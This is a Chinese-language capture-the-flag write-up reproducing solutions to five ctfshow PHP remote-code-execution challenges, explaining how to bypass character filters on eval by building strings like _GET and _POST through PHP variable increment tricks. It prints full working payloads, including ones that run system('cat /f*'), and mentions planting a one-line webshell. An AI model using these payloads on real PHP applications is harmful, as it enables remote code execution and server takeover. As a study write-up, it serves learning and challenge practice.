前言
ctfshow出的这五道rce感觉挺好玩的,但自己没做出几道来,所以来详细的复现一下,这几道题基本都是利用的自增,但长度逐渐缩短,雀氏极限。
RCE1
源码
分析
可以看到我们最后执行的是eval,而过滤的只有( 和. ,而php eval函数的作用是把字符串按照PHP代码来计算,比如果我们写入 echo `1` 就会写入1 ,如果我们写入的是一句话木马,就可以成功植入木马,执行rce
payload
code=echo `$_POST[1]`;&1=cat /f*
RCE2
\"|`~\\\\]/",$ctfshow)){ eval($ctfshow); }else{ echo("Are you hacking me AGAIN?"); } }else{ phpinfo(); }}?>分析
基本把能用的都过滤了,只剩下$()_+;[],.=/字符,p神的文章好早之前就提出过,自增rce
思路就是,我们rce需要字母,但字母都过滤了,所以我们就要想办法去构造字母,p神是用
强制连接数组和字符串,数组将被转换成字符串,其值为Array,而我们如果取Array的第[0]个字母的话就是A,而A++就是B,例如:
之后我们可以用 . 把字母拼接起来,
payload
注释有分解。
$_=[].''; //得到Array$_=$_['/'=='+']; //让[]里的值报错返回0,取Array[0]=A,此时$_=A$____='_'; //让$____=_,后面容易拼接$__=$_; //将A赋给$__$__++;$__++;$__++;$__++;$__++;$__++; //A自增到G,此时$__=G$____.=$__; //将_和G拼接起来,此时$____=_G$__=$_; //再将$__还原成A$__++;$__++;$__++;$__++; //A自增到E,此时__=E$____.=$__; //E和_G拼接,此时$____为_GE$__=$_; //再将__换源成A$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; //A自增成T此时__=T$____.=$__; //再拼接成_GET,此时$____=_GET$_=$____; //为了方便起见,我们把____换成_($$_[_])($$_[__]); //拼成我们想要的($_GET[_])($_GET[__]),传入_和__命令执行即可 最后换成一行rce即可
RCE3
源码
\"|`~\\\\]/",$ctfshow)){ eval($ctfshow); }else{ echo("Are you hacking me AGAIN?"); } }else{ phpinfo(); }}?>分析
这个过滤和rce2差不多,但吧1和0给放出来了,也限制了长度<=105,可以看一下这个文章
BSides Noida CTF 2021 Web Calculate_bfengj的博客-CSDN博客
得到NAN再用上面相同的方法获得N,从N开始构造的话长度就比上一个方法少多了,原理还是上一题的自增,试着构造一下,当我是想直接$a[0]的时候,他没有回显,原来是因为现在的NAN还不算字符串,所以后面要在拼接一个例如
就可以得到我们想要的N了,但我我们需要字母才能构造N,就用上一题同样的方法构造出A来,因为0可以用了,所以我们就不用让报错直接用[0]就可以了
然后我们就可以得到N了
之后再跟上一步一样一步一步自增就可以了
payload
注释有解析。
$_=([].[])[0]; //得到Array$_=($_/$_.$_)[0]; //__=N$_++; //O$__=$_.$_++; //拼接PO$_++;$_++;$_++; //S$__.=$_;$_++; //T$_=_.$__.$_; //拼接_和POST$$_[0]($$_[1]); //$_POST[0]($_POST[1])RCE4,RCE5
之后就是越来越少的长度,就直接分析一下师傅们的pyload
72位
%2b;$_=_.$_.%2b%2b$%ff.%2b%2b$%ff;$$_[%ff]($$_[_]);&%ff=system&_=cat /f*
68位
$_=_(a/a)[_];//N$a=++$_;//O$$a[$a=_.++$_.$a[$_++/$_++].++$_.++$_]($$a[_]);//巧妙的把两次$_++放在一起$a=_.++$_.$a[$_++/$_++].++$_.++$_//$a直接拼接出_POST $$a[_POST]($$a[_])//$_POST[_POST]($_POST[_])
62位
来源地址:https://blog.csdn.net/qq_63928796/article/details/127963079
